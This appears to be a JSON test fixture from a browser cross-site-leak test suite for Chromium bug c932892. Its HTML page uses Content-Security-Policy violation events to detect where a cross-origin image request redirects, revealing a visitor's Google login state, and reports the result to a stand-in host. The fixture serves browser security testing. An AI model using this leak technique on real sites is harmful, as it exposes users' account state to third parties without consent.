```json
{
  "c932892": {
    "leak.test": {
      "main": {
        "index.html": "<img src=\"https://bugs.chromium.org/attachment?leak=c932892\" onerror=\"reportRedirect()\">\n<script>\n  function reportRedirect() {\n    document.addEventListener(\"securitypolicyviolation\", function(e) {\n      if (e.blockedURI.includes('accounts.google.com')) {\n        document.location.href = \"https://a.test/report/?leak=c932892-redirected-to-google\";\n      } else if (e.blockedURI.includes('googleusercontent.com')) {\n        document.location.href = \"https://a.test/report/?leak=c932892-redirected-to-googleusercontent\";\n      } else {\n        document.location.href = \"https://a.test/report/?leak=c932892-no-redirect\";\n      }\n    });\n  }\n</script>",
        "headers.json": "[\n    {\n        \"key\": \"Content-Security-Policy\",\n        \"value\": \"default-src 'self'; img-src 'none'; report-uri /report/?leak=c932892\"\n    }\n]"
      }
    }
  }
}
```